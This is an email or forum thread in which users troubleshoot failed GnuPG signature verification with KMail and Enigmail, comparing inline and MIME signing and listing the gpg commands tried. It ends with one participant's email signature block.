Sometimes my signatures are being counted as bad ones. But I figured out it is a bug on kmail or enigmail (there were bug reports on both implementations). Well, I'm just about to figure it out, so there may be another issue instead of them both. According to the question in the topic: inline signatures always worked, MIME didn't. I still wonder why, and after my next exams I'll investigate on that...

Beckus

I try to be extremely clear. I cannot verify your signature, neither with Enigmail nor using gpg stand-alone. My version is 1.4.12.

Steps to reproduce the event:

1) I import your key using your key-ID from within gpg 1.4.12 typing gpg --recv-keys [your key id], result: gpg has imported your key, everything's all right here.
2) I open the header of your message.
3) I copy the signature and save it as a beckus_sig.asc file using a simple text editor (or, optionally, as signature.asc)
4) I type gpg --verify beckus_sig.asc (or signature.asc)
5) gpg outputs: No valid OpenPGP data found. Signature verification failed.

(I am retranslating that into English, so please be kind with any imprecision you may find).

What's wrong with what I am doing?

Stephan

Hi, now I'll use the inline format. If you can now verify my signature, this still could be the same bug (or whatever it is...).

--
I use GnuPG (GPG) for E-Mail encryption and signing. If you want some privacy, my public key ID is 2F9D4F14. The file signature.asc this message includes contains a cryptographic signature which enables you to verify this E-Mail really was written by me.

Christopher Beck
Gerhart-Hauptmann-Str. 1
91058 Erlangen
Tel.: 09131 / 9245437
Fax.: 09131 / 8148708
Jabber: bec...@jabber.org
EPVPN: (+49 221 59619) - 5232